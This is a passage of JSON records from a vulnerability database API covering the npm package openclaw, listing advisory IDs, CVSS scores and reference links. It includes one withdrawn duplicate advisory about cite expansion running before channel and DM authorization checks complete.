                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "GHSA-59xc-5v89-r7pr"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-r9y1-z2ax-z3e2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89843?format=api",
            "vulnerability_id": "VCID-rf6b-q7cj-jbgc",
            "summary": "Duplicate Advisory: OpenClaw: Tlon cite expansion happens before channel and DM authorization is complete\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-vfg3-pqpq-93m4. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 performs cite expansion before completing channel and DM authorization checks, allowing cite-expansion work and content handling to occur before the final authorization decision. Attackers can exploit this timing vulnerability to access or manipulate content before authorization validation completes.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35637",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35637"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-p6j4-wvmc-vx2h",
                    "reference_id": "GHSA-p6j4-wvmc-vx2h",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-p6j4-wvmc-vx2h"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
